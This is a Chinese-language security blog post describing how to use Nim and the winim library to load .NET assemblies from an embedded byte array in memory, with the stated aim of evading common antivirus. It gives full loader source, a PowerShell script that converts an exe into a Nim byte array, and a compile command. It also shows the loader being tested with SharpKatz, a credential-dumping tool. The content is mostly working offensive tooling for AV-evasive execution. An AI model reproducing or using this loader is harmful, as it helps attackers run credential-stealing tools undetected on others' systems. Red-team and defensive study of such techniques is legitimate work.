Nim套娃加載.NET程序集 - 網安 - 專業的網絡安全產業、社區、知識平臺

Nim套娃加載.NET程序集

VSole2021-08-28 23:22:14

簡介

使用OffensiveNim繞過常見殺軟。

Start the game

主要用到的庫是WINIM

import winim/clr
import sugar
import strformat
# Just pops a message box... or does it? ;)
var buf: array[4608, byte] = [byte 0x4d,0x5a,0x90,0x0]
echo "[*] Installed .NET versions"
for v in clrVersions():
    echo fmt"    \--- {v}"
echo ""
echo ""
var assembly = load(buf)
dump assembly
var arr = toCLRVariant([""], VT_BSTR) # Passing no arguments
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))
arr = toCLRVariant(["From Nim & .NET!"], VT_BSTR) # Actually passing some args
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))

作者提供了一個ps腳本將exe轉為符合nim的bytes數組。

function CSharpToNimByteArray
{
Param
    (
        [string]
        $inputfile,
	    [switch]
        $folder
)
    if ($folder)
    {
        $Files = Get-Childitem -Path $inputfile -File
        $fullname = $Files.FullName
        foreach($file in $fullname)
        {
            Write-Host "Converting $file"
            $outfile = $File + "NimByteArray.txt"
    
            [byte[]] $hex = get-content -encoding byte -path $File
            $hexString = ($hex|ForEach-Object ToString X2) -join ',0x'
            $Results = $hexString.Insert(0,"var buf: array[" + $hex.Length + ", byte] = [byte 0x")
            $Results = $Results + "]"         
            $Results | out-file $outfile
         
        }
        Write-Host -ForegroundColor yellow "Results Written to the same folder"
    }
    else
    {
        Write-Host "Converting $inputfile"
        $outfile = $inputfile + "NimByteArray.txt"
        
        [byte[]] $hex = get-content -encoding byte -path $inputfile
        $hexString = ($hex|ForEach-Object ToString X2) -join ',0x'
        $Results = $hexString.Insert(0,"var buf: array[" + $hex.Length + ", byte] = [byte 0x")
        $Results = $Results + "]"         
        $Results | out-file $outfile
        Write-Host "Result Written to $outfile"
    }
}

測試SharpKatz

體積有點大。

編譯

nim c -d=mingw --app=console --cpu=amd64 execute_assembly.nim

Bingo

體積只有800k。

現在還沒法執行自定義參數，源碼修改后如下:

import winim/clr
import sugar
import strformat
import os
# Just pops a message box... or does it? ;)
var buf: array[4608, byte] = [byte 0x4d,0x5a,0x90,0x0]
echo "[*] Installed .NET versions"
for v in clrVersions():
    echo fmt"    \--- {v}"
echo ""
echo ""
var assembly = load(buf)
dump assembly
var cmd: seq[string]
var i = 1
while i <= paramCount():
    cmd.add(paramStr(i))
    inc(i)
echo cmd
var arr = toCLRVariant(cmd, VT_BSTR)
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))

echo

撤稿糾錯

本作品采用《CC 協議》，轉載必須注明作者和本文鏈接